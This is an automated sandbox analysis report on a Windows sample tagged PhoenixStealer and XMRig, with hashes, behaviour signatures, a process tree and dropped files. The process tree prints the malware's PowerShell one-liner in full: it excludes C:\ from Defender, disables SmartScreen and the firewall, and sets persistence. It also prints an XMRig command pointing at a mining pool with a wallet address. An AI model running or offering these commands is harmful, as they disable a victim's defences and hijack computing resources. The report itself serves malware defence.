phoenixstealer | 9f2c2e2bcc9acf06fde3c0066db3befe4f89dad3cc66821c1633c5491eb10a5e

Analysis

max time kernel
501s
max time network
558s
platform
windows7_x64
resource
win7-20220414-en
submitted
07-07-2022 08:03

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

haha.exe
Size

3.0MB
MD5

9984a772edde2f48200fe346b4ef8547
SHA1

c8760bb8c67926372461f2a43471ac1466c024ed
SHA256

9f2c2e2bcc9acf06fde3c0066db3befe4f89dad3cc66821c1633c5491eb10a5e
SHA512

e144e0f43888e503a0c866bcc059e3152a5fa4464232d3e2df5bc559b55e9a8128070bbc353ec8ca427187abc58ddd37ff211a071bbbe2200395590ead1ba1da

Score

10^/10

phoenixstealer xmrig evasion miner stealer suricata

Malware Config

Signatures

Modifies security service 2 TTPs 1 IoCs
evasion

Modify Registry
T1112

Modify Existing Service
T1031

Processes:

powershell.exe

description ioc process

Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\MpsSvc\Start = "4" powershell.exe
PhoenixStealer
PhoenixStealer is an information stealer written in the C++, it sends the stolen information to cybercriminals.
stealer phoenixstealer
suricata: ET MALWARE Win32/HunterStealer/AlfonsoStealer/PhoenixStealer CnC Exfil
suricata: ET MALWARE Win32/HunterStealer/AlfonsoStealer/PhoenixStealer CnC Exfil
suricata
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\MpsSvc\Start = "4"	powershell.exe

XMRig Miner Payload 2 IoCs

miner

Processes:

resource	yara_rule
\ProgramData\Systemd\procexp.exe	xmrig
C:\ProgramData\Systemd\procexp.exe	xmrig

Downloads MZ/PE file
Executes dropped EXE 7 IoCs

Processes:

79571.exebuild_220706_120246samopis.exeDllHost.exeprocexp.exeUpSys.exeUpSys.exeUpSys.exe

pid process

1560 79571.exe
1208 build_220706_120246samopis.exe
20596 DllHost.exe
213592 procexp.exe
213972 UpSys.exe
213472 UpSys.exe
213696 UpSys.exe
Modifies Windows Firewall 1 TTPs 1 IoCs
evasion

Modify Existing Service
T1031

Processes:

netsh.exe

pid process

214008 netsh.exe
Drops startup file 1 IoCs

Processes:

DllHost.exe

description ioc process

File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\exe.lnk DllHost.exe

pid	process
1560	79571.exe
1208	build_220706_120246samopis.exe
20596	DllHost.exe
213592	procexp.exe
213972	UpSys.exe
213472	UpSys.exe
213696	UpSys.exe

pid	process
214008	netsh.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\exe.lnk	DllHost.exe

Loads dropped DLL 10 IoCs

Processes:

powershell.exe79571.exeDllHost.exepowershell.exe

pid	process
976	powershell.exe
976	powershell.exe
976	powershell.exe
1560	79571.exe
1560	79571.exe
1560	79571.exe
20636
20596	DllHost.exe
20596	DllHost.exe
213512	powershell.exe

Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

9 api.ipify.org
10 api.ipify.org
12 api.ipify.org
Suspicious use of SetThreadContext 1 IoCs

Processes:

build_220706_120246samopis.exe

description pid process target process

PID 1208 set thread context of 213440 1208 build_220706_120246samopis.exe AppLaunch.exe

flow	ioc
9	api.ipify.org
10	api.ipify.org
12	api.ipify.org

description	pid	process	target process
PID 1208 set thread context of 213440	1208	build_220706_120246samopis.exe	AppLaunch.exe

Drops file in Windows directory 4 IoCs

Processes:

makecab.exeNOTEPAD.EXE7zG.exe

description	ioc	process
File created	C:\Windows\Logs\CBS\CbsPersist_20220707080516.cab	makecab.exe
File opened for modification	C:\Windows\Logs\CBS\CbsPersist_20220707080516.log	NOTEPAD.EXE
File created	C:\Windows\Logs\CBS\CbsPersist_20220707080516.log	7zG.exe
File opened for modification	C:\Windows\Logs\CBS\CbsPersist_20220707080516.log	7zG.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Modifies data under HKEY_USERS 5 IoCs

Processes:

UpSys.exepowershell.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	UpSys.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	UpSys.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	UpSys.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 90d0dd4fd891d801	powershell.exe

Opens file in notepad (likely ransom note) 3 IoCs
ransomware

Processes:

NOTEPAD.EXENOTEPAD.EXENOTEPAD.EXE

pid process

1360 NOTEPAD.EXE
1820 NOTEPAD.EXE
1640 NOTEPAD.EXE

pid	process
1360	NOTEPAD.EXE
1820	NOTEPAD.EXE
1640	NOTEPAD.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exeDllHost.exepowershell.exeUpSys.exe

pid	process
976	powershell.exe
20596	DllHost.exe
20596	DllHost.exe
20596	DllHost.exe
20596	DllHost.exe
20596	DllHost.exe
20596	DllHost.exe
20596	DllHost.exe
20596	DllHost.exe
20596	DllHost.exe
20596	DllHost.exe
20596	DllHost.exe
20596	DllHost.exe
20596	DllHost.exe
20596	DllHost.exe
20596	DllHost.exe
20596	DllHost.exe
20596	DllHost.exe
20596	DllHost.exe
20596	DllHost.exe
20596	DllHost.exe
20596	DllHost.exe
20596	DllHost.exe
20596	DllHost.exe
20596	DllHost.exe
20596	DllHost.exe
20596	DllHost.exe
20596	DllHost.exe
20596	DllHost.exe
20596	DllHost.exe
20596	DllHost.exe
20596	DllHost.exe
20596	DllHost.exe
20596	DllHost.exe
20596	DllHost.exe
213512	powershell.exe
20596	DllHost.exe
20596	DllHost.exe
20596	DllHost.exe
20596	DllHost.exe
20596	DllHost.exe
20596	DllHost.exe
20596	DllHost.exe
20596	DllHost.exe
20596	DllHost.exe
20596	DllHost.exe
20596	DllHost.exe
20596	DllHost.exe
20596	DllHost.exe
20596	DllHost.exe
20596	DllHost.exe
20596	DllHost.exe
20596	DllHost.exe
20596	DllHost.exe
20596	DllHost.exe
20596	DllHost.exe
213972	UpSys.exe
20596	DllHost.exe
20596	DllHost.exe
213972	UpSys.exe
20596	DllHost.exe
20596	DllHost.exe
20596	DllHost.exe
20596	DllHost.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

NOTEPAD.EXE

pid process

1640 NOTEPAD.EXE
Suspicious behavior: LoadsDriver 1 IoCs

Processes:

pid process

464

pid	process
1640	NOTEPAD.EXE

pid	process
464

Suspicious use of AdjustPrivilegeToken 20 IoCs

Processes:

powershell.exeprocexp.exepowershell.exeUpSys.exeUpSys.exeAUDIODG.EXEpowershell.exe7zG.exe

description	pid	process
Token: SeDebugPrivilege	976	powershell.exe
Token: SeLockMemoryPrivilege	213592	procexp.exe
Token: SeLockMemoryPrivilege	213592	procexp.exe
Token: SeDebugPrivilege	213512	powershell.exe
Token: SeDebugPrivilege	213972	UpSys.exe
Token: SeAssignPrimaryTokenPrivilege	213972	UpSys.exe
Token: SeIncreaseQuotaPrivilege	213972	UpSys.exe
Token: 0	213972	UpSys.exe
Token: SeDebugPrivilege	213472	UpSys.exe
Token: SeAssignPrimaryTokenPrivilege	213472	UpSys.exe
Token: SeIncreaseQuotaPrivilege	213472	UpSys.exe
Token: 33	213752	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	213752	AUDIODG.EXE
Token: SeDebugPrivilege	2040	powershell.exe
Token: 33	213752	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	213752	AUDIODG.EXE
Token: SeRestorePrivilege	1600	7zG.exe
Token: 35	1600	7zG.exe
Token: SeSecurityPrivilege	1600	7zG.exe
Token: SeSecurityPrivilege	1600	7zG.exe

Suspicious use of FindShellTrayWindow 2 IoCs

Processes:

procexp.exe7zG.exe

pid process

213592 procexp.exe
1600 7zG.exe

pid	process
213592	procexp.exe
1600	7zG.exe

Suspicious use of WriteProcessMemory 40 IoCs

Processes:

haha.exepowershell.exe79571.exebuild_220706_120246samopis.exeDllHost.exepowershell.exeUpSys.exe

description	pid	process	target process
PID 2044 wrote to memory of 976	2044	haha.exe	powershell.exe
PID 2044 wrote to memory of 976	2044	haha.exe	powershell.exe
PID 2044 wrote to memory of 976	2044	haha.exe	powershell.exe
PID 2044 wrote to memory of 976	2044	haha.exe	powershell.exe
PID 976 wrote to memory of 1560	976	powershell.exe	79571.exe
PID 976 wrote to memory of 1560	976	powershell.exe	79571.exe
PID 976 wrote to memory of 1560	976	powershell.exe	79571.exe
PID 976 wrote to memory of 1560	976	powershell.exe	79571.exe
PID 1560 wrote to memory of 1208	1560	79571.exe	build_220706_120246samopis.exe
PID 1560 wrote to memory of 1208	1560	79571.exe	build_220706_120246samopis.exe
PID 1560 wrote to memory of 1208	1560	79571.exe	build_220706_120246samopis.exe
PID 1560 wrote to memory of 1208	1560	79571.exe	build_220706_120246samopis.exe
PID 1560 wrote to memory of 20596	1560	79571.exe	DllHost.exe
PID 1560 wrote to memory of 20596	1560	79571.exe	DllHost.exe
PID 1560 wrote to memory of 20596	1560	79571.exe	DllHost.exe
PID 1560 wrote to memory of 20596	1560	79571.exe	DllHost.exe
PID 1208 wrote to memory of 213440	1208	build_220706_120246samopis.exe	AppLaunch.exe
PID 1208 wrote to memory of 213440	1208	build_220706_120246samopis.exe	AppLaunch.exe
PID 1208 wrote to memory of 213440	1208	build_220706_120246samopis.exe	AppLaunch.exe
PID 1208 wrote to memory of 213440	1208	build_220706_120246samopis.exe	AppLaunch.exe
PID 1208 wrote to memory of 213440	1208	build_220706_120246samopis.exe	AppLaunch.exe
PID 1208 wrote to memory of 213440	1208	build_220706_120246samopis.exe	AppLaunch.exe
PID 1208 wrote to memory of 213440	1208	build_220706_120246samopis.exe	AppLaunch.exe
PID 1208 wrote to memory of 213440	1208	build_220706_120246samopis.exe	AppLaunch.exe
PID 20596 wrote to memory of 213512	20596	DllHost.exe	powershell.exe
PID 20596 wrote to memory of 213512	20596	DllHost.exe	powershell.exe
PID 20596 wrote to memory of 213512	20596	DllHost.exe	powershell.exe
PID 20596 wrote to memory of 213592	20596	DllHost.exe	procexp.exe
PID 20596 wrote to memory of 213592	20596	DllHost.exe	procexp.exe
PID 20596 wrote to memory of 213592	20596	DllHost.exe	procexp.exe
PID 1208 wrote to memory of 213440	1208	build_220706_120246samopis.exe	AppLaunch.exe
PID 213512 wrote to memory of 213972	213512	powershell.exe	UpSys.exe
PID 213512 wrote to memory of 213972	213512	powershell.exe	UpSys.exe
PID 213512 wrote to memory of 213972	213512	powershell.exe	UpSys.exe
PID 213512 wrote to memory of 214008	213512	powershell.exe	netsh.exe
PID 213512 wrote to memory of 214008	213512	powershell.exe	netsh.exe
PID 213512 wrote to memory of 214008	213512	powershell.exe	netsh.exe
PID 213696 wrote to memory of 2040	213696	UpSys.exe	powershell.exe
PID 213696 wrote to memory of 2040	213696	UpSys.exe	powershell.exe
PID 213696 wrote to memory of 2040	213696	UpSys.exe	powershell.exe

C:\Users\Admin\AppData\Local\Temp\haha.exe
"C:\Users\Admin\AppData\Local\Temp\haha.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2044
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -F C:\Users\Admin\AppData\Local\Temp\79571.ps1
  2⤵
  - Loads dropped DLL
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:976
- - C:\Users\Admin\AppData\Local\Temp\79571.exe
    "C:\Users\Admin\AppData\Local\Temp\79571.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:1560
  - - C:\Users\Admin\AppData\Local\Temp\build_220706_120246samopis.exe
      "C:\Users\Admin\AppData\Local\Temp\build_220706_120246samopis.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      Suspicious use of WriteProcessMemory
      PID:1208
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
        5⤵
        
        PID:213440
  - - C:\Users\Admin\AppData\Local\Temp\DllHost.exe
      "C:\Users\Admin\AppData\Local\Temp\DllHost.exe"
      4⤵
      Executes dropped EXE
      Drops startup file
      Loads dropped DLL
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of WriteProcessMemory
      PID:20596
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\ProgramData\UpSys.exe /SW:0 powershell.exe $(Add-MpPreference -ExclusionPath C:\); $(cd HKLM:\); $(New-ItemProperty вЂ“Path $HKLM\SOFTWARE\Policies\Microsoft\Windows\System вЂ“Name EnableSmartScreen -PropertyType DWord -Value 0); $(Set-ItemProperty -Path $HKLM\SYSTEM\CurrentControlSet\Services\mpssvc -Name Start -Value 4); $(netsh advfirewall set allprofiles state off); $(Get-Acl C:\ProgramData\Microsoft\Windows\SystemData | Set-Acl C:\ProgramData\MicrosoftNetwork); $(New-ItemProperty вЂ“Path $HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run вЂ“Name WinNet -PropertyType String -Value C:\ProgramData\MicrosoftNetwork\System.exe); $(New-Item -Path C:\ProgramData -Name check.txt -ItemType file -Value 1); $(exit)
        5⤵
        Modifies security service
        Loads dropped DLL
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:213512
      - C:\ProgramData\UpSys.exe
        
        "C:\ProgramData\UpSys.exe" /SW:0 powershell.exe
        6⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:213972
        
        C:\ProgramData\UpSys.exe
        
        "C:\ProgramData\UpSys.exe" /SW:0 powershell.exe
        7⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:213472
        
        C:\ProgramData\UpSys.exe
        
        "C:\ProgramData\UpSys.exe" /TI/ /SW:0 powershell.exe
        8⤵
        Executes dropped EXE
        Modifies data under HKEY_USERS
        Suspicious use of WriteProcessMemory
        
        PID:213696
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
        9⤵
        Modifies data under HKEY_USERS
        Suspicious use of AdjustPrivilegeToken
        
        PID:2040
      - C:\Windows\system32\netsh.exe
        
        "C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off
        6⤵
        Modifies Windows Firewall
        
        PID:214008
    - - C:\ProgramData\Systemd\procexp.exe
        
        --url pool.hashvault.pro:80 --user 42kFTbPkrpEY8KRSdRjzLpawdNvmR1BTKPRfaaGoq9TcDNhnKapy9G99eH9AsJon766YDYnKEobxycNSDuHbPG3JHV5zKut --pass x
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        
        PID:213592

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe"
1⤵
PID:94308

C:\Windows\system32\makecab.exe
"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20220707080516.log C:\Windows\Logs\CBS\CbsPersist_20220707080516.cab
1⤵
- Drops file in Windows directory
PID:213668

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x4e8
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:213752

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Windows\Logs\CBS\CbsPersist_20220707080516.log
1⤵
- Drops file in Windows directory
- Opens file in notepad (likely ransom note)
PID:1360

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Windows\Logs\CBS\CBS.log
1⤵
- Opens file in notepad (likely ransom note)
PID:1820

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Windows\Logs\CBS\" -an -ai#7zMap20388:102:7zEvent1143
1⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1600

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Windows\Logs\CBS\CbsPersist_20220707080516.log
1⤵
- Opens file in notepad (likely ransom note)
- Suspicious behavior: GetForegroundWindowSpam
PID:1640

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Systemd\procexp.exe

Filesize
7.9MB

MD5
2d9fb9ed8bebb55280b81a4652dcfa11

SHA1
76300e059e74d8cfc99a736917cd3a512dd32cab

SHA256
573fc41ae5b597cbb3e2255224013aa861d23b6608b2efef20685ff393e6b8bf

SHA512
ae984a21cbf9c556407ad8ee60c07342884d5905cd0e9aece195ed44cca82d434b24da931be346e1cecea8fca856af6dd3dcd2994f95f5895647fe029650ce9c

Download Submit
C:\ProgramData\UpSys.exe

Filesize
923KB

MD5
efe5769e37ba37cf4607cb9918639932

SHA1
f24ca204af2237a714e8b41d54043da7bbe5393b

SHA256
5f9dfd9557cf3ca96a4c7f190fc598c10f8871b1313112c9aea45dc8443017a2

SHA512
33794a567c3e16582da3c2ac8253b3e61df19c255985277c5a63a84a673ac64899e34e3b1ebb79e027f13d66a0b8800884cdd4d646c7a0abe7967b6316639cf1

Download Submit
C:\ProgramData\UpSys.exe

Filesize
923KB

MD5
efe5769e37ba37cf4607cb9918639932

SHA1
f24ca204af2237a714e8b41d54043da7bbe5393b

SHA256
5f9dfd9557cf3ca96a4c7f190fc598c10f8871b1313112c9aea45dc8443017a2

SHA512
33794a567c3e16582da3c2ac8253b3e61df19c255985277c5a63a84a673ac64899e34e3b1ebb79e027f13d66a0b8800884cdd4d646c7a0abe7967b6316639cf1

Download Submit
C:\ProgramData\UpSys.exe

Filesize
923KB

MD5
efe5769e37ba37cf4607cb9918639932

SHA1
f24ca204af2237a714e8b41d54043da7bbe5393b

SHA256
5f9dfd9557cf3ca96a4c7f190fc598c10f8871b1313112c9aea45dc8443017a2

SHA512
33794a567c3e16582da3c2ac8253b3e61df19c255985277c5a63a84a673ac64899e34e3b1ebb79e027f13d66a0b8800884cdd4d646c7a0abe7967b6316639cf1

Download Submit
C:\ProgramData\UpSys.exe

Filesize
923KB

MD5
efe5769e37ba37cf4607cb9918639932

SHA1
f24ca204af2237a714e8b41d54043da7bbe5393b

SHA256
5f9dfd9557cf3ca96a4c7f190fc598c10f8871b1313112c9aea45dc8443017a2

SHA512
33794a567c3e16582da3c2ac8253b3e61df19c255985277c5a63a84a673ac64899e34e3b1ebb79e027f13d66a0b8800884cdd4d646c7a0abe7967b6316639cf1

Download Submit
C:\Users\Admin\AppData\Local\Temp\79571.exe

Filesize
1.8MB

MD5
cb9659a181ad8cc58023c5d8566b2d5a

SHA1
7b6c751aefca16847c2b1e57712342a7dffe585f

SHA256
d08aeb5728d24a7b12f86c2751382d15572bdebbff06fa083c4a792592074cc2

SHA512
6d6bc8815cae73207c0dd9825ce8b8d7b4191a37c05c3bff1ebd5189a4f0db0b84c067126b0050fae34725c5de9cdb8cceb8ec6296be2099a2c12ad93deb7c24

Download Submit
C:\Users\Admin\AppData\Local\Temp\79571.exe

Filesize
1.8MB

MD5
cb9659a181ad8cc58023c5d8566b2d5a

SHA1
7b6c751aefca16847c2b1e57712342a7dffe585f

SHA256
d08aeb5728d24a7b12f86c2751382d15572bdebbff06fa083c4a792592074cc2

SHA512
6d6bc8815cae73207c0dd9825ce8b8d7b4191a37c05c3bff1ebd5189a4f0db0b84c067126b0050fae34725c5de9cdb8cceb8ec6296be2099a2c12ad93deb7c24

Download Submit
C:\Users\Admin\AppData\Local\Temp\79571.ps1

Filesize
128B

MD5
d831df909c8d68d7ac710f09ea9a7294

SHA1
4cf51399d9895c799c297e5e3078fa25cf4940b5

SHA256
9771d530fb3067031df355268df854d6f162d97074ae8883ffb30b7350cf8f0c

SHA512
000959c53063ee99db5ec20448a23e6406720c611ed225b7f8ed92855c1c576b2127cb48c6508cb61a00c9ab96fc40bed81a94e5db5ff18db520aacf48ac0e77

Download Submit
C:\Users\Admin\AppData\Local\Temp\DllHost.exe

Filesize
440KB

MD5
6368031626da1f0d51bcac43104b123f

SHA1
5a340a1a3edc0bf03526e677a0415ffd156c139c

SHA256
11004aff3ee4083623a7e01cb06438e1b8879e2d00cf2350c26fb1003125577d

SHA512
442b04dc415858e61555b0f026c6ebb76fcad22f9317736766bb793dbcc22fc014ddb1973feaff05298905bf2e97036aa64ae96fa9cc9884d50015d17fbac465

Download Submit
C:\Users\Admin\AppData\Local\Temp\DllHost.exe

Filesize
440KB

MD5
6368031626da1f0d51bcac43104b123f

SHA1
5a340a1a3edc0bf03526e677a0415ffd156c139c

SHA256
11004aff3ee4083623a7e01cb06438e1b8879e2d00cf2350c26fb1003125577d

SHA512
442b04dc415858e61555b0f026c6ebb76fcad22f9317736766bb793dbcc22fc014ddb1973feaff05298905bf2e97036aa64ae96fa9cc9884d50015d17fbac465

Download Submit
C:\Users\Admin\AppData\Local\Temp\build_220706_120246samopis.exe

Filesize
2.8MB

MD5
77636b47fc9e1bc61a4a019371e09390

SHA1
615275ae7a28ee86cd9f4f586a3c7c5366490444

SHA256
7fbed14d0d7d52a459fc29bae6a62eedd0a69649049b8f9ac37e1297acc3b277

SHA512
ea73fe48dc36d0dd2344e3389bb70a7f047a210f08578bdb5ff4e690e3f95fab0412edcb52819234ca28ff0d983fa8646bc1e2e76f1134df937896f115f8c37d

Download Submit
C:\Windows\Logs\CBS\CbsPersist_20220707080516.cab

Filesize
2.1MB

MD5
a32bd4bba702ab65887cc2819c0770f7

SHA1
aa978c40cb493b6216b74d860785051782cdb7fb

SHA256
45681c21b74225ca0e816bed870e3ddb81fc3ecbaaa4af964810321109309c4f

SHA512
a7a21033b068679172019b2964cf133647120259ca6e21c915cfbc159316bf92a588aa19e73b804601e64e97f8e065e4ae1b56d51c46b53fbbc3e5e11e10e0e2

Download Submit
C:\Windows\Logs\CBS\CbsPersist_20220707080516.log

Filesize
45.9MB

MD5
65cc66bc672dfe15e3f6cd35686ccb9c

SHA1
8f64ff9c931a9a92534639fddd15f4c67936438c

SHA256
6f83c8ddccc53d8788a808fcbcf500001ffc2ee9e0be71ec01a32fed536338dd

SHA512
73b106db474ccf13557ae3a8a8351e8605b0d6f04ea1dfd66033d24aea263f9bf57e89aa5d751acb25ac622e4c4e52443d4b72fff2055810fb06f93657abf8fe

Download Submit
\??\PIPE\srvsvc

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\ProgramData\MicrosoftNetwork\System.exe

Filesize
440KB

MD5
6368031626da1f0d51bcac43104b123f

SHA1
5a340a1a3edc0bf03526e677a0415ffd156c139c

SHA256
11004aff3ee4083623a7e01cb06438e1b8879e2d00cf2350c26fb1003125577d

SHA512
442b04dc415858e61555b0f026c6ebb76fcad22f9317736766bb793dbcc22fc014ddb1973feaff05298905bf2e97036aa64ae96fa9cc9884d50015d17fbac465

Download Submit
\ProgramData\Systemd\procexp.exe

Filesize
7.9MB

MD5
2d9fb9ed8bebb55280b81a4652dcfa11

SHA1
76300e059e74d8cfc99a736917cd3a512dd32cab

SHA256
573fc41ae5b597cbb3e2255224013aa861d23b6608b2efef20685ff393e6b8bf

SHA512
ae984a21cbf9c556407ad8ee60c07342884d5905cd0e9aece195ed44cca82d434b24da931be346e1cecea8fca856af6dd3dcd2994f95f5895647fe029650ce9c

Download Submit
\ProgramData\UpSys.exe

Filesize
923KB

MD5
efe5769e37ba37cf4607cb9918639932

SHA1
f24ca204af2237a714e8b41d54043da7bbe5393b

SHA256
5f9dfd9557cf3ca96a4c7f190fc598c10f8871b1313112c9aea45dc8443017a2

SHA512
33794a567c3e16582da3c2ac8253b3e61df19c255985277c5a63a84a673ac64899e34e3b1ebb79e027f13d66a0b8800884cdd4d646c7a0abe7967b6316639cf1

Download Submit
\Users\Admin\AppData\Local\Temp\79571.exe

Filesize
1.8MB

MD5
cb9659a181ad8cc58023c5d8566b2d5a

SHA1
7b6c751aefca16847c2b1e57712342a7dffe585f

SHA256
d08aeb5728d24a7b12f86c2751382d15572bdebbff06fa083c4a792592074cc2

SHA512
6d6bc8815cae73207c0dd9825ce8b8d7b4191a37c05c3bff1ebd5189a4f0db0b84c067126b0050fae34725c5de9cdb8cceb8ec6296be2099a2c12ad93deb7c24

Download Submit
\Users\Admin\AppData\Local\Temp\79571.exe

Filesize
1.8MB

MD5
cb9659a181ad8cc58023c5d8566b2d5a

SHA1
7b6c751aefca16847c2b1e57712342a7dffe585f

SHA256
d08aeb5728d24a7b12f86c2751382d15572bdebbff06fa083c4a792592074cc2

SHA512
6d6bc8815cae73207c0dd9825ce8b8d7b4191a37c05c3bff1ebd5189a4f0db0b84c067126b0050fae34725c5de9cdb8cceb8ec6296be2099a2c12ad93deb7c24

Download Submit
\Users\Admin\AppData\Local\Temp\79571.exe

Filesize
1.8MB

MD5
cb9659a181ad8cc58023c5d8566b2d5a

SHA1
7b6c751aefca16847c2b1e57712342a7dffe585f

SHA256
d08aeb5728d24a7b12f86c2751382d15572bdebbff06fa083c4a792592074cc2

SHA512
6d6bc8815cae73207c0dd9825ce8b8d7b4191a37c05c3bff1ebd5189a4f0db0b84c067126b0050fae34725c5de9cdb8cceb8ec6296be2099a2c12ad93deb7c24

Download Submit
\Users\Admin\AppData\Local\Temp\DllHost.exe

Filesize
440KB

MD5
6368031626da1f0d51bcac43104b123f

SHA1
5a340a1a3edc0bf03526e677a0415ffd156c139c

SHA256
11004aff3ee4083623a7e01cb06438e1b8879e2d00cf2350c26fb1003125577d

SHA512
442b04dc415858e61555b0f026c6ebb76fcad22f9317736766bb793dbcc22fc014ddb1973feaff05298905bf2e97036aa64ae96fa9cc9884d50015d17fbac465

Download Submit
\Users\Admin\AppData\Local\Temp\DllHost.exe

Filesize
440KB

MD5
6368031626da1f0d51bcac43104b123f

SHA1
5a340a1a3edc0bf03526e677a0415ffd156c139c

SHA256
11004aff3ee4083623a7e01cb06438e1b8879e2d00cf2350c26fb1003125577d

SHA512
442b04dc415858e61555b0f026c6ebb76fcad22f9317736766bb793dbcc22fc014ddb1973feaff05298905bf2e97036aa64ae96fa9cc9884d50015d17fbac465

Download Submit
\Users\Admin\AppData\Local\Temp\build_220706_120246samopis.exe

Filesize
2.8MB

MD5
77636b47fc9e1bc61a4a019371e09390

SHA1
615275ae7a28ee86cd9f4f586a3c7c5366490444

SHA256
7fbed14d0d7d52a459fc29bae6a62eedd0a69649049b8f9ac37e1297acc3b277

SHA512
ea73fe48dc36d0dd2344e3389bb70a7f047a210f08578bdb5ff4e690e3f95fab0412edcb52819234ca28ff0d983fa8646bc1e2e76f1134df937896f115f8c37d

Download Submit
\Users\Admin\AppData\Local\Temp\build_220706_120246samopis.exe

Filesize
2.8MB

MD5
77636b47fc9e1bc61a4a019371e09390

SHA1
615275ae7a28ee86cd9f4f586a3c7c5366490444

SHA256
7fbed14d0d7d52a459fc29bae6a62eedd0a69649049b8f9ac37e1297acc3b277

SHA512
ea73fe48dc36d0dd2344e3389bb70a7f047a210f08578bdb5ff4e690e3f95fab0412edcb52819234ca28ff0d983fa8646bc1e2e76f1134df937896f115f8c37d

Download Submit
memory/976-65-0x0000000073F90000-0x000000007453B000-memory.dmp

Filesize
5.7MB

Download
memory/976-57-0x0000000073F90000-0x000000007453B000-memory.dmp

Filesize
5.7MB

Download
memory/976-55-0x0000000000000000-mapping.dmp

Download
memory/1208-79-0x0000000000400000-0x00000000005C5000-memory.dmp

Filesize
1.8MB

Download
memory/1208-68-0x0000000000000000-mapping.dmp

Download
memory/1208-115-0x0000000000400000-0x00000000005C5000-memory.dmp

Filesize
1.8MB

Download
memory/1560-63-0x0000000000000000-mapping.dmp

Download
memory/2040-178-0x000000000241B000-0x000000000243A000-memory.dmp

Filesize
124KB

Download
memory/2040-177-0x0000000002414000-0x0000000002417000-memory.dmp

Filesize
12KB

Download
memory/2040-176-0x000007FEEEBF0000-0x000007FEEF74D000-memory.dmp

Filesize
11.4MB

Download
memory/2040-174-0x000007FEF2D30000-0x000007FEF3753000-memory.dmp

Filesize
10.1MB

Download
memory/2040-172-0x0000000000000000-mapping.dmp

Download
memory/2044-54-0x0000000075441000-0x0000000075443000-memory.dmp

Filesize
8KB

Download
